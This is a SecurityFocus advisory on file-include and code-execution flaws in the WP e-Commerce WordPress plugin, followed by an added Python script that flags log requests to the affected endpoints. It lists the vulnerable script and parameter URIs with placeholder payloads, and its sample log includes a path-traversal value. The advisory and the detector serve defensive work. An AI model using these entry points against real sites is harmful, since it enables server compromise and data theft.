WordPress WP e-Commerce Plugin Multiple Security Vulnerabilities

An attacker can exploit these issues using a web browser.

The following example URIs are available:

Local file-include
http://www.example.com/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=[LFI]

Remote code-execution
http://www.example.com/wp-e-commerce/wpsc-admin/ajax.php?wpsc_action=[CMD]
http://www.example.com/wp-e-commerce/wpsc-admin/display-sales-logs.php?c=[CMD]
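
To check web server access logs for requests that reach the script and parameter pairs listed above, the following added example can be used. It is not part of the original advisory or of the plugin's code. It assumes the Apache/nginx combined log format; the names WATCHED, classify and scan and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script paths and parameter names taken from the example URIs in this advisory.
WATCHED = {
    "/wpsc-includes/misc.functions.php": ("image_name", "local file-include"),
    "/wpsc-admin/ajax.php": ("wpsc_action", "remote code-execution"),
    "/wpsc-admin/display-sales-logs.php": ("c", "remote code-execution"),
}

# Assumed layout: client ... "METHOD target HTTP/x.y" status ...
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')


def classify(line):
    """Return (client, issue, param, value, status) for a watched request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    parts = urlsplit(target)
    for suffix, (param, issue) in WATCHED.items():
        # Suffix match, because the plugin directory prefix differs per site.
        if parts.path.endswith(suffix):
            values = parse_qs(parts.query, keep_blank_values=True).get(param)
            if values:
                # parse_qs percent-decodes, so encoded separators become visible.
                return (client, issue, param, values[0], int(status))
    return None


def scan(lines):
    """Return every watched request found in an iterable of log lines."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample log lines (documentation IP ranges, placeholder values).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2010:10:00:00 +0000] "GET /wp-e-commerce/wpsc-includes/misc.functions.php?image_name=..%2F..%2Fexample.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2010:10:00:05 +0000] "GET /wp-e-commerce/wpsc-admin/ajax.php?wpsc_action=example HTTP/1.1" 200 64',
    '198.51.100.9 - - [01/Jan/2010:10:01:00 +0000] "POST /wp-e-commerce/wpsc-admin/display-sales-logs.php?c=example HTTP/1.1" 403 0',
    '198.51.100.9 - - [01/Jan/2010:10:02:00 +0000] "GET /wp-e-commerce/wpsc-admin/display-sales-logs.php HTTP/1.1" 200 2048',
    '198.51.100.20 - - [01/Jan/2010:10:03:00 +0000] "GET /index.php?c=1 HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit means a request reached one of the listed script and parameter pairs and needs review; it does not by itself confirm exploitation.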


 

Copyright 2010, SecurityFocus